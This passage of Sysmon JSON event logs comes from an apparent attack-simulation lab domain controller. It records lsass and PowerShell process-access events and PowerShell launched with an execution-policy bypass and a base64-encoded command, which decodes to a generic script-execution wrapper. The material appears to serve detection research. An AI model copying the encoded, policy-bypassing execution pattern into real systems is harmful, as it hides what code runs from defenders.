C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.088","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010200F0800}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5534,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.088\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010200F0800}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.088","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010200F0800}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5535,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.154\r\nProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nProcessId: 872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010200F0800}\r\nParentProcessId: 4740\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.154","ProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010200F0800}","ParentProcessId":"4740","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5536,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010200F0800}\r\nSourceProcessId: 4740\r\nSourceThreadId: 4508\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+986a2f1d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+985f50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b0485e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b62d2d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46392(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b46223(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b381a8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b446db(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b442ce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43ff7(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b43cc8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+985f50dd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b2ab29(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97b2a0f9(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010200F0800}","SourceProcessId":"4740","SourceThreadId":"4508","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","TargetProcessId":"872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed